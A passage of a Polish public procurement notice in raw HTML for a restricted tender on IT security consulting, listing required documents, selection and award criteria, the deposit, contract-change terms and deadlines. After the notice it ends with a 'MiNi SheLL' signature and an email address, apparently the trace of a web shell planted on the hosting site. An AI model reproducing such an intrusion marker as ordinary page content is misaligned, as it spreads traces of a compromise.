10.8.1.3.	Dokumenty, o których mowa w pkt 10.8.1.1. i 10.8.1.2.2., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert /wniosków o dopuszczenie do udziału w postępowaniu. Dokumenty, o których mowa w pkt 10.8.1.2.1., powinny być wystawione nie wcześniej niż 3 miesiące przed upływem tego terminu.
10.8.2.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub w kraju, w którym miejsce zamieszkania mają osoby, których dotyczą dokumenty, nie wydaje się dokumentów o których mowa w pkt 10.8.1.1. i 10.8.1.2.2., zastępuje się je dokumentem zawierającym oświadczenie, odpowiednio Wykonawcy, ze wskazaniem osób uprawnionych do jego reprezentacji, lub oświadczeniem których dokument miał dotyczy, złożonym przed notariuszem lub przed właściwym - ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tych osób - organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego. Przepisy pkt. 10.8.1.3.  stosuje się. 
10.8.3.	Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osób, które mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składają dokument wydany przez właściwy organ sądowy lub administracyjny państwa, w którym osoba ma miejsce zamieszkania w zakresie określonym w art. 24 ust. 1 pkt 14 i 21 ustawy Pzp. W przypadku, gdy w państwie, w którym mają miejsce zamieszkania wskazane w zdaniu pierwszym osoby, nie wydaje się takich zaświadczeń  zastępuje się je dokumentem zawierającym oświadczenie tych osób złożonym przed notariuszem lub przed właściwym ze względu na miejsce zamieszkania tych osób organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego. Przepisy pkt. 10.8.1.3.  stosuje się. 

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />10.2.	W celu potwierdzenia spełniania przez Wykonawcę warunków, o których mowa w pkt 7 SIWZ, Zamawiający żąda następujących dokumentów:
10.2.1.	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacją o ich kwalifikacjach zawodowych, doświadczeniu i wykształceniu oraz podstawie do dysponowania tymi osobami, na formularzu zgodnym z treścią załącznika określonego we wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego.
10.2.2.	Wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - na formularzu zgodnym z treścią załącznika określonego we wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego 
Dowodami, o których wyżej mowa, są:
	referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były wykonywane, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert/wniosku o dopuszczenie do udziału w postępowaniu;
	oświadczenie Wykonawcy  jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać referencji bądź innych dokumentów, o których wyżej mowa. 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />Wykonawca składa wniosek o dopuszczenie do udziału w postępowaniu, wraz z Wykazem osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacją o ich kwalifikacjach zawodowych, doświadczeniu i wykształceniu oraz podstawie do dysponowania tymi osobami, na formularzu zgodnym z treścią załącznika określonego we wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego oraz Wykazem usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - na formularzu zgodnym z treścią załącznika określonego we wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego.</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wniosek o dopuszczenie o udziału w postępowaniu wraz z załącznikami - wg. wzoru stanowiącego załącznik nr 4 do SIWZ. Wykonawca zobowiązany jest dołączyć do wniosku o dopuszczenie do udziału w postępowaniu aktualne na dzień składania ofert oświadczenie zawierające w szczególności informacje o innych podmiotach, na zasoby których Wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu, wraz z informacją dotyczącą podstaw wykluczenia innego podmiotu, o których mowa w art. 24 ust. 1 pkt 1322 i ust. 5 pkt 1 i 8 ustawy Pzp  jeżeli dotyczy. Wykonawca zobowiązany jest dołączyć do wniosku o dopuszczenie do udziału w postępowaniu aktualne na dzień składania ofert oświadczenie zawierające w szczególności informacje o podwykonawcach  jeśli Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom zobowiązany jest wskazać części zamówienia, których wykonanie zamierza  powierzyć podwykonawcom oraz podać nazwy firm podwykonawców w składanej ofercie
 9.1.3.1.Wykonawca, który polega na zdolnościach innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, że realizując zamówienie, będzie miał rzeczywisty dostęp do zasobów tych podmiotów w zakresie niezbędnym do należytego wykonania zamówienia, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Z treści załączonych dokumentów powinien wynikać: 
9.1.3.1.1.zakres dostępnych Wykonawcy zasobów innego podmiotu,
9.1.3.1.2.sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
9.1.3.1.3.zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia,
9.1.3.1.4.czy inne podmioty, na zdolności których Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizują usługi, których wskazane zdolności dotyczą.
9.4.1.	Oświadczenie o grupie kapitałowej. Wykonawca, w terminie 3 dni od dnia przekazania informacji o wynikach oceny spełniania warunków udziału w postępowaniu i otrzymanych ocenach spełniania tych warunków, zobowiązany jest przekazać Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej. W stosownej sytuacji, wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą, nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
10.10.1.	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty/ wniosku o dopuszczenie do udziału w postępowaniu należy dołączyć pełnomocnictwo podpisane przez osoby uprawnione do reprezentowania Wykonawcy. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony (zakres umocowania). Pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem.
Wykonawcy zobowiązani są załączyć do oferty Dokumentację Inicjującą Projekt (DIP), w której przedstawią wstępną koncepcję realizacji i zarządzania pracami doradczymi objętymi niniejszym zamówieniem. Dokument będzie podlegał ocenie w kryterium oceny ofert, o którym mowa w pkt 17 SIWZ</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg ograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający wymaga wniesienia wadium w wysokości  9 000,00 (słownie: dziewięć tysięcy złotych) przed upływem terminu składania ofert określonego w SIWZ.
Szczegółowe informacje dot. wadium znajdują się w pkt 12 SIWZ.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  5<br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />Zdolność techniczna lub zawodowa:
Jeżeli liczba wniosków spełniających minimalne wymagania będzie większa niż 5, Zamawiający dokona oceny wg następujących kryteriów: 
7.7.1.1.	Oceniając zdolność techniczną; przyzna po 10 pkt za  każdą wykonaną własnymi siłami dodatkową wykazaną i udokumentowaną usługę zrealizowaną w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, polegającą na:
7.7.1.1.1.	opracowaniu PBI w jednostkach administracji publicznej, zatrudniających ponad 800 osób, o wartość nie mniejszej niż 200.000 PLN brutto,

i/lub

7.7.1.1.2.	a) opracowaniu planu ciągłości działania usług IT zawierającego co najmniej: analizę zagrożeń oraz ryzyka dla biznesu wraz z szacowaniem ryzyka związanego z utratą ciągłości działania IT, sposoby testowania scenariuszy odtworzeniowych, procedury zapewnienia ciągłości świadczenia usług IT w sytuacji awaryjnej (min. 25 procedur), procedury powołania i działania zespołu kryzysowego IT oraz mechanizmów komunikacji wewnętrznej w sytuacji krytycznej, a także sposoby testowania scenariuszy odtworzeniowych,

b) przeprowadzeniu testów weryfikujących poprawność przynajmniej 3 procedur odtworzeniowych wchodzących w skład planu ciągłości działania, przy czym wszystkie testy wykazały możliwość realizacji procedur poniżej założonego czasu odtwarzania,
c) opracowaniu następujących procedur bezpieczeństwa dla jednostki administracji publicznej:
	monitorowania bezpieczeństwa systemów i infrastruktury informatycznej, 
	zarządzania incydentami bezpieczeństwa, 
	zarządzania narzędziami chroniącymi przed złośliwym oprogramowaniem,
	zarządzania podatnościami systemów i infrastruktury informatycznej, 
	dotyczących wykorzystywania zabezpieczeń kryptograficznych.

i/lub

7.7.1.1.3.	wsparciu wdrożenia Systemu Zarządzania Bezpieczeństwem Informacji (SZBI) w jednostkach administracji publicznej, o wartość nie mniejszej niż 200.000 PLN brutto,

	i/lub

7.7.1.1.4.	opracowaniu projektu rozwiązania (wdrożenia) lub modernizacji systemu informatycznego opartego na SZBI na platformie Oracle lub równoważnej, przetwarzającego dane osobowe, o wartość nie mniejszej niż 200.000 PLN brutto.
Wykonawca może otrzymać maksymalnie 50 pkt w powyższym kryterium.
UWAGA! W przypadku gdy Wykonawca w kryterium selekcji wykaże własne doświadczenie a na potwierdzenie spełniania warunku udziału w postępowaniu będzie polegał na zasobach innego podmiotu, to wówczas Zamawiający uzna w pierwszej kolejności jego własne doświadczenie jako potwierdzenie spełniania warunku udziału w postępowaniu. 
Zamawiający nie będzie przyznawał punktów w kryterium selekcji w przypadku posługiwania się przez Wykonawcę cudzym doświadczeniem.

7.7.1.2.	Oceniając zdolność zawodową (dot. Eksperta ds. systemów bezpieczeństwa). Zamawiający dokona oceny wg następujących kryteriów: każda z ww. osób wskazana przez Wykonawcę, posiadająca wskazane uprawnienia i minimalny staż pracy (powyżej 3 lat), otrzyma po 5 pkt za każdy kolejny rok doświadczenia zawodowego z zakresu bezpieczeństwa systemów teleinformatycznych - przy czym liczy się tylko każdy zakończony rok, liczony do terminu składania wniosków. 
Wykonawca może otrzymać maksymalnie 50 pkt w powyższym kryterium.

7.7.2.	Zamawiający dokona zsumowania pkt otrzymanych w każdym z kryterium selekcji.
7.7.3.	Zamawiający zaprosi do składania ofert 5 Wykonawców, którzy spełniają warunki udziału w postępowaniu oraz otrzymali najwyższą liczbę pkt, z zastrzeżeniem, iż:
7.7.4.	W przypadku gdy nie można będzie dokonać zakwalifikowania 5 wniosków z uwagi na to, że 2 lub więcej wniosków uzyska taką samą liczbę punktów, Zamawiający wybierze te, w których wartość wykonanych usług, określonych jako minimum dla spełnienia warunku wiedzy i doświadczenia ogólnie będzie większa.  Do złożenia ofert zostanie zaproszonych pierwszych pięciu Wykonawców, którzy spełnili wszystkie warunki udziału w postępowaniu i uzyskali w kolejności najwyższe oceny punktowe, o których mowa powyżej.
7.7.5.	W przypadku, gdy liczba Wykonawców, którzy złożą wnioski o dopuszczenie do udziału w postępowaniu będzie mniejsza niż 5  do II etapu postępowania zostaną zakwalifikowani wszyscy Wykonawcy, którzy spełniają warunki udziału w postępowaniu i udokumentują wymagania określone w SIWZ. W sytuacji otrzymania takiej samej liczby punktów dopuścimy wszystkich Wykonawców do złożenia ofert.
7.7.6.	Wykonawcę niezaproszonego do składania ofert traktuje się jako wykluczonego z postępowania o udzielenie zamówienia.
</div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Dokumentacja Inicjująca Projekt DIP  </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zamawiający przewiduje możliwość wprowadzenia zmiany istotnych postanowień Umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku:
1)	wprowadzenia zmiany stawki podatku VAT lub innych zobowiązań publicznoprawnych, 
2)	zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy;
Ponadto, niezależnie od wymienionych w pkt 1 ) i 2)  powyżej Zamawiający przewiduje możliwość dokonania następujących zmian istotnych postanowień Umowy:
3)	zmiany końcowego terminu realizacji zamówienia lub terminów realizacji poszczególnych usług doradczych wymienionych w § 2 ust.1 Umowy, o ile zmiana taka jest uzasadniona i konieczna w celu prawidłowej realizacji Umowy, a nie wynika z przyczyn leżących po stronie Wykonawcy; pod warunkiem, że jest korzystna dla Zamawiającego;
4)	zmian w wykazie podwykonawców, którzy biorą udział w wykonywaniu Umowy  w zakresie dostosowania Umowy do tych zmian, za uprzednią zgodą Zamawiającego, w zakresie powierzenia podwykonawcom innego zakresu części zamówienia niż wskazany w ofercie Wykonawcy;
5)	zmiany osób określonych w Umowie, wyznaczonych przez Strony do realizacji zamówienia (wynikającej z przyczyn obiektywnych, zmian organizacyjnych leżących po stronie Zamawiającego albo z decyzji Zamawiającego);
6)	zmian wynikających z wystąpienia siły wyższej, przy czym za siłę wyższą uznaje się zdarzenia niezależne od Strony, zewnętrzne o charakterze nadzwyczajnym, niemożliwym do przewidzenia i uniknięcia, w szczególności takie jak: wojny, powstania, zamieszki, epidemie, osunięcia gruntu, trzęsienia ziemi, powodzie, wybuchy i inne podobne nieprzewidywalne zdarzenia poza kontrolą którejkolwiek ze Stron oraz których żadna ze Stron nie może pokonać przy dołożeniu należytej staranności.
7)	zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3- 5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, większa niż 20 % w stosunku do stanu z chwili zawarcia umowy, w ten sposób, że Wykonawca po tej zmianie przedstawi listę płac osób uczestniczących przy wykonaniu umowy i wykaże jak zmiana ta wpłynęła na koszt wykonania zamówienia. Zamawiający zwiększy wynagrodzenie Wykonawcy o połowę różnicy pomiędzy otrzymywanym minimalnym wynagrodzeniem po zmianie, a otrzymywanym minimalnym wynagrodzeniem przed zmianą;
8)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne o więcej niż 20 %  w stosunku do dnia zawarcia umowy w ten sposób, że Wykonawca po zmianie zasad przedstawi listę płac osób uczestniczących przy wykonaniu umowy i wykaże jak zmiana ta wpłynęła na koszt wykonania zamówienia. Zamawiający zwiększy wynagrodzenie wykonawcy o połowę różnicy pomiędzy uiszczanymi składkami po zmianie, a uiszczanymi składkami przed zmianą;
- jeżeli zmiany te  będą miały wpływ na koszty wykonania przez Wykonawcę zamówienia publicznego, każda ze stron umowy od wejścia w życie przepisów dokonujących tych zmian, może zwrócić się do drugiej strony o przeprowadzenie negocjacji w sprawie odpowiedniej zmiany wynagrodzenia.

2.	Zmiany, o których mowa powyżej nie mogą spowodować zwiększenia wartości wynagrodzenia brutto, o którym mowa w § 6 ust. 1 Umowy, z wyjątkiem przypadku wskazanego w ust.1 pkt 1), 7) oraz 8) niniejszego paragrafu.
3.	Wszelkie zmiany i uzupełnienia do Umowy wymagają formy pisemnej pod rygorem nieważności.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/11/2016, godzina: 10:15,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferta/wniosek o dopuszczenie do udziału w postępowaniu wraz z załącznikami musi być sformułowana/-y w języku polskim<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com